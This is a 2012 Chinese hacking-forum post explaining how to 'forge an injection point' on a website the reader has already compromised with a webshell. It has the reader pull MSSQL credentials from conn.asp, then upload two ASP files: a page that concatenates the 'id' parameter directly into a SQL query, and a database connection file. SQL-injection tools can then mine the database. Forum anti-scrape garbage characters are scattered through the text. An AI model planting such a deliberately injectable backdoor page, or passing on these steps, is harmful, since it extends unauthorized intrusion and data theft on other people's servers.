找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1985|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
9 v& \7 ?% A7 C7 G8 M6 L
" m$ \( p' [/ ?) G' j" {6 O! c2 U今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息9 K: G2 Z0 c! T

/ {& \2 g; F* B9 z1 i/ L这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
8 l6 I0 q- c- w9 }8 U
3 W& s8 x; R# ~! a首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
( W3 A( u1 r* h# }) Z' R  d0 |/ C8 z
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
" t: l2 e$ V8 E6 V: ^) q- v1 @3 t* E- n2 D. J: L+ p- y* Z
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
* G+ b9 C) P1 U5 u4 }5 B7 n# ~3 S. G9 ^: p) V
程序代码/ G8 F9 g3 S' Y: n
<!--#include file="xx.asp"-->
( V+ T% T: N( I4 r1 @<%
6 D4 e1 a. D5 W% l; Lset rs=server.createobject("ADODB.recordset")
  H' z0 C3 R9 i' s7 Did = request("id")3 ]$ m8 u. B7 p2 s( X8 N
strSQL = "select * from admin where id=" & id; M" ]: i' a1 E$ O& Z8 v; `
rs.open strSQL,conn,1,3' J* u. @! ~( C9 }- A$ R
rs.close' q+ e' q- R9 Z- \$ o
%>
4 Y  G( V% ?+ R7 \2 E
4 c0 C$ k( m0 q! x; q; H$ N5 D把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在( _8 w3 e8 C2 \, R' @" w1 m# K8 L
* s, N% |! n. k3 c1 z
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 l% ]4 c7 u2 H! p* n& q
8 |) u! S2 x4 J: q9 h  J% S然后就要构造一个连接数据库的文件了,代码如下:2 @: I- E. g8 ^8 b! y6 p9 W) W
程序代码% |" J1 V- m9 c& C
<%        
- {, }/ F. D3 z# @5 _" k3 vstrSQLServerName = "000.000.000.000"     '服务器名称或地址8 O/ N) K/ i2 h( J
strSQLDBUserName = "sqlname"         '数据库帐号
+ J" Q6 J! b3 G, D7 qstrSQLDBPassword = "sqlpass"         '数据库密码
# b* Y, a8 B( W* Y( Y9 j4 @strSQLDBName = "sqldataname"           '数据库名称
2 U) p% D/ w( k( O7 L0 nSet conn = Server.CreateObject("ADODB.Connection")
% v/ Z' c4 Z* n  O- U$ HstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";") i* ~4 d! G+ D0 V; \* e8 t' j2 x% k2 [
conn.open strCon
2 s4 p8 }$ X, ^" c3 {%>
4 P0 K; }6 ^/ c# a( l
! r1 M# ?  ]& O3 c" u这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
: p& Y2 D  k3 f. s( u3 ]; h8 A+ E& e5 ?
就这样,正常情况下,就OK了,伪造成功……4 a& L& ^7 r- h& o. o0 V

' \6 m9 ~3 t  o7 @           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表